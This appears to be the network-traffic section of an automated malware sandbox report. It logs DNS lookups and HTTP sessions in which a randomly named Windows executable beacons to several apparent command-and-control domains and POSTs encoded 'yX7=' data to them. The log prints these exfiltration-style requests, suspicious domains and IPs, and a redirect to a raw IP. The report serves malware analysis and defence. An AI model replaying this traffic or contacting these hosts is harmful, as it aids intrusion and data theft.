Nov 25, 2024 13:46:04.246927977 CET | 53 | 64989 | 1.1.1.1 | 192.168.2.6
Nov 25, 2024 13:46:20.635588884 CET | 53952 | 53 | 192.168.2.6 | 1.1.1.1
Nov 25, 2024 13:46:21.224195957 CET | 53 | 53952 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 13:45:00.939471006 CET | 192.168.2.6 | 1.1.1.1 | 0xcf86 | Standard query (0) | www.huiguang.xyz | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:45:18.602067947 CET | 192.168.2.6 | 1.1.1.1 | 0x1070 | Standard query (0) | www.beingandbecoming.ltd | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:45:33.728423119 CET | 192.168.2.6 | 1.1.1.1 | 0xe90c | Standard query (0) | www.futurevision.life | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:45:48.688644886 CET | 192.168.2.6 | 1.1.1.1 | 0xfa95 | Standard query (0) | www.schedulemassage.xyz | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:46:03.635704994 CET | 192.168.2.6 | 1.1.1.1 | 0xf842 | Standard query (0) | www.mcfunding.org | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:46:20.635588884 CET | 192.168.2.6 | 1.1.1.1 | 0x934f | Standard query (0) | www.migorengya8.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 13:44:08.369273901 CET | 1.1.1.1 | 192.168.2.6 | 0xf6fe | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 13:44:08.369273901 CET | 1.1.1.1 | 192.168.2.6 | 0xf6fe | No error (0) | fp2e7a.wpc.phicdn.net | - | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:45:01.754430056 CET | 1.1.1.1 | 192.168.2.6 | 0xcf86 | No error (0) | www.huiguang.xyz | - | 154.216.76.80 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:45:19.310136080 CET | 1.1.1.1 | 192.168.2.6 | 0x1070 | No error (0) | www.beingandbecoming.ltd | beingandbecoming.ltd | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 13:45:19.310136080 CET | 1.1.1.1 | 192.168.2.6 | 0x1070 | No error (0) | beingandbecoming.ltd | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:45:19.310136080 CET | 1.1.1.1 | 192.168.2.6 | 0x1070 | No error (0) | beingandbecoming.ltd | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:45:34.315078974 CET | 1.1.1.1 | 192.168.2.6 | 0xe90c | No error (0) | www.futurevision.life | - | 203.161.49.193 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:45:49.331501961 CET | 1.1.1.1 | 192.168.2.6 | 0xfa95 | No error (0) | www.schedulemassage.xyz | schedulemassage.xyz | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 13:45:49.331501961 CET | 1.1.1.1 | 192.168.2.6 | 0xfa95 | No error (0) | schedulemassage.xyz | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:45:49.331501961 CET | 1.1.1.1 | 192.168.2.6 | 0xfa95 | No error (0) | schedulemassage.xyz | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:46:04.246927977 CET | 1.1.1.1 | 192.168.2.6 | 0xf842 | No error (0) | www.mcfunding.org | mcfunding.org | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 13:46:04.246927977 CET | 1.1.1.1 | 192.168.2.6 | 0xf842 | No error (0) | mcfunding.org | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:46:04.246927977 CET | 1.1.1.1 | 192.168.2.6 | 0xf842 | No error (0) | mcfunding.org | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 13:46:21.224195957 CET | 1.1.1.1 | 192.168.2.6 | 0x934f | No error (0) | www.migorengya8.click | migorengya8.click | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 13:46:21.224195957 CET | 1.1.1.1 | 192.168.2.6 | 0x934f | No error (0) | migorengya8.click | - | 198.252.98.54 | A (IP address) | IN (0x0001) | false
                                                            • www.huiguang.xyz
                                                            • www.beingandbecoming.ltd
                                                            • www.futurevision.life
                                                            • www.schedulemassage.xyz
                                                            • www.mcfunding.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49827 | 154.216.76.80 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:45:01.890682936 CET | 543 | OUT | GET /hv6g/?Hx=ot9h&yX7=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q= HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.huiguang.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 25, 2024 13:45:03.449635983 CET | 827 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 25 Nov 2024 12:45:03 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 601
                                                            Last-Modified: Thu, 21 Nov 2024 04:22:01 GMT
                                                            Connection: close
                                                            ETag: "673eb569-259"
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e5 ae 89 e5 85 a8 e8 bf 9b e5 85 a5 2e 2e 2e 2e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 63 66 39 35 66 61 33 39 66 34 61 37 32 63 65 36 62 38 35 62 62 66 62 65 39 65 61 64 62 39 35 61 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 [TRUNCATED]
                                                            Data Ascii: <!doctype html><html><head> <title>.......</title> <meta charset="utf-8"><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95a"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></head><body><script> window.onload = function() { setTimeout(function() { window.location.href = 'https://34.92.79.175:19817'; }, 1000); // 1 }; </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49866 | 3.33.130.190 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:45:19.611828089 CET | 831 | OUT | POST /79tr/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.beingandbecoming.ltd
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 208
                                                            Cache-Control: no-cache
                                                            Origin: http://www.beingandbecoming.ltd
                                                            Referer: http://www.beingandbecoming.ltd/79tr/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 35 2b 47 59 36 57 75 36 70 72 6d 2b 68 64 4b 79 4d 36 47 5a 72 64 34 38 62 72 4a 52 41 78 32 38 45 66 35 42 43 54 77 68 37 47 7a
                                                            Data Ascii: yX7=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgW5+GY6Wu6prm+hdKyM6GZrd48brJRAx28Ef5BCTwh7Gz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49874 | 3.33.130.190 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:45:22.263685942 CET | 855 | OUT | POST /79tr/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.beingandbecoming.ltd
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 232
                                                            Cache-Control: no-cache
                                                            Origin: http://www.beingandbecoming.ltd
                                                            Referer: http://www.beingandbecoming.ltd/79tr/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 36 66 76 4a 70 79 57 72 38 48 79 31 68 6f 35 43 64 64 34 38 49 75 64 4c 46 59 75 55 77 54 69 38 44 55 65 57 5a 51 62 73 70 4b 7a 42 39 4a 43 69 4a 76 56 49 44 50 42 6b 32 63 4d 37 33 32 34 65 4d 52 37 4f 36 37 69 31 5a 4f 56 58 63 49 66 4d 2f 36 6f 38 34 75 6c 41 34 43 4f 6e 41 4b 30 48 4e 79 51 4b 41 63 2b 49 49 65 57 79 52 54 49 4f 42 4e 47 6d 6f 4f 55 50 6a 44 53 61 57 33 75 75 71 42 2f 58 41 51 75 2f 36 6c 4c 37 39 36 38 5a 7a 37 52 67 78 63 2b 45 6e 35 54 56 66 58 75 50 6a 51 41 41 6d 52 49 77 6d 72 41 76 33 2b 39 65 43 72 56 46 33 50 39 51 3d 3d
                                                            Data Ascii: yX7=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbS6fvJpyWr8Hy1ho5Cdd48IudLFYuUwTi8DUeWZQbspKzB9JCiJvVIDPBk2cM7324eMR7O67i1ZOVXcIfM/6o84ulA4COnAK0HNyQKAc+IIeWyRTIOBNGmoOUPjDSaW3uuqB/XAQu/6lL7968Zz7Rgxc+En5TVfXuPjQAAmRIwmrAv3+9eCrVF3P9Q==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49883 | 3.33.130.190 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:45:24.923760891 CET | 1868 | OUT | POST /79tr/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.beingandbecoming.ltd
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1244
                                                            Cache-Control: no-cache
                                                            Origin: http://www.beingandbecoming.ltd
                                                            Referer: http://www.beingandbecoming.ltd/79tr/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 43 66 75 2b 42 79 5a 73 41 48 7a 31 68 6f 36 43 64 63 34 38 49 4a 64 4c 39 63 75 55 73 44 69 2b 4c 55 66 30 52 51 50 4a 46 4b 6b 52 39 4a 4f 43 4a 75 4b 59 43 4e 42 6b 6d 69 4d 37 6e 32 34 65 4d 52 37 4d 53 37 72 47 42 4f 47 6e 63 50 4c 63 2f 32 73 38 35 35 6c 44 4a 33 4f 6e 30 77 30 7a 35 79 51 71 51 63 38 64 55 65 4f 69 52 52 45 75 41 51 47 6d 6b 4e 55 4c 44 6c 53 5a 4b 4a 75 70 71 42 7a 67 52 7a 71 37 71 76 61 36 6c 59 71 4c 33 45 49 32 42 37 7a 6a 4c 2b 66 44 71 6c 70 38 33 72 4f 58 6d 63 49 52 58 54 50 50 2f 4f 2f 72 6e 4d 65 31 33 4c 68 32 74 32 47 74 5a 63 61 70 4d 56 35 7a 30 73 49 6a 63 53 30 6e 45 44 34 53 6b 59 63 49 48 45 38 65 59 48 4a 38 51 4b 72 45 55 5a 38 4b 32 61 58 4d 63 34 48 79 6b 69 38 4d 74 48 73 79 71 70 2b 6b 73 59 4f 44 52 2b 43 56 47 67 75 36 75 48 57 6d 4c 69 36 5a 71 41 69 2f 56 69 48 2f 73 66 73 33 2b 78 70 41 34 6a 43 50 69 4f 72 2f [TRUNCATED]
                                                            Data Ascii: yX7=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 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49890 | 3.33.130.190 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:45:27.582034111 CET | 551 | OUT | GET /79tr/?yX7=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&Hx=ot9h HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.beingandbecoming.ltd
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Nov 25, 2024 13:45:28.719489098 CET | 403 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Mon, 25 Nov 2024 12:45:28 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 263
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yX7=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&Hx=ot9h"}</script></head></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.6 | 49906 | 203.161.49.193 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 13:45:34.450251102 CET | 822 | OUT | POST /hxmz/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.futurevision.life
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 208
                                                            Cache-Control: no-cache
                                                            Origin: http://www.futurevision.life
                                                            Referer: http://www.futurevision.life/hxmz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Ascii: yX7=8cwN9mJXk9DUEr8m8paBS3F/bfli4c/KrAu9frQcBpqLZVKXmFksWBjEBzIsz/RgqGl6vnOweH3INEEMZErcudQrdNr95SiLxC4sXkeldQoF489/XoTcpyBMvaCdQV5MnrHMboGagsUoa957S9HepvRtchsyQVNLRF554kCpGDvkiXPE48teaSMekxNMgtMTGqkhKjWO+YzK
                                                            Nov 25, 2024 13:45:35.709458113 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Mon, 25 Nov 2024 12:45:35 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.6 | 49913 | 203.161.49.193 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 13:45:37.109692097 CET | 846 | OUT | POST /hxmz/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.futurevision.life
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 232
                                                            Cache-Control: no-cache
                                                            Origin: http://www.futurevision.life
                                                            Referer: http://www.futurevision.life/hxmz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Ascii: yX7=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/6LexaXnEksRBjEKTIp3/RvqGpyvkWweHjINAUMYz/f8dQpWtr/2yiLxC4sXkaPdQwF7NN/VJTdkSBToaCdBF4LnrHLbte0gqYoa4d7TozfjvRjTBt2DWo1JWIZySePTwX7qBSekPt9ICsckzV+gNM5EqchY0apxsWpeFDYONqtq/efm2IEJjep4Q==
                                                            Nov 25, 2024 13:45:38.417433977 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Mon, 25 Nov 2024 12:45:38 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.6 | 49919 | 203.161.49.193 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 13:45:39.778448105 CET | 1859 | OUT | POST /hxmz/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.futurevision.life
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1244
                                                            Cache-Control: no-cache
                                                            Origin: http://www.futurevision.life
                                                            Referer: http://www.futurevision.life/hxmz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Ascii: yX7= [TRUNCATED]
                                                            Nov 25, 2024 13:45:41.100908995 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Mon, 25 Nov 2024 12:45:40 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.6 | 49928 | 203.161.49.193 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 13:45:42.436083078 CET | 548 | OUT | GET /hxmz/?Hx=ot9h&yX7=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts= HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.futurevision.life
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Nov 25, 2024 13:45:43.659126043 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                            Date: Mon, 25 Nov 2024 12:45:43 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.6 | 49945 | 3.33.130.190 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 13:45:49.467888117 CET | 828 | OUT | POST /slxp/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.schedulemassage.xyz
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 208
                                                            Cache-Control: no-cache
                                                            Origin: http://www.schedulemassage.xyz
                                                            Referer: http://www.schedulemassage.xyz/slxp/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Ascii: yX7=dp+M27OzYBUBgIP+YWWkqUYaHOBZ3+2imQV/AL5mh96onii4qxRTB6oAPVKKTmFia+YMSluR5CEcNNmRuJZF3toKnaiIwX6qzreYDnsNrmIEbm+QMWe6SZnZl5BAbaBqJTzd1nhQjeZOiyUY2av5M/8GYy3fj5vpWn63JTXWce1f2BZ7A+pqze1xDr59NAUY4Z2xJoO18MPZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.6 | 49952 | 3.33.130.190 | 80 | 3196 | C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 13:45:52.125418901 CET | 852 | OUT | POST /slxp/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.schedulemassage.xyz
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 232
                                                            Cache-Control: no-cache
                                                            Origin: http://www.schedulemassage.xyz
                                                            Referer: http://www.schedulemassage.xyz/slxp/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Ascii: yX7=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhveonGu44EtTA6oAXFLAXmF1a+UiShmR5CAcNJiRu6xGtdoIu6iO936qzreYDjErrmQEb2uQN0m5Npnei5BAR6BuJTzj1i4YjchOi3wY2Lv+D/9Ncy20k4SQSUjNHB/OBYZOz3EhcNpJhOVzDphPNgUy6ZOxb/CSz4q6p5AIdDp+rboJMH0ke0hqtg==


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
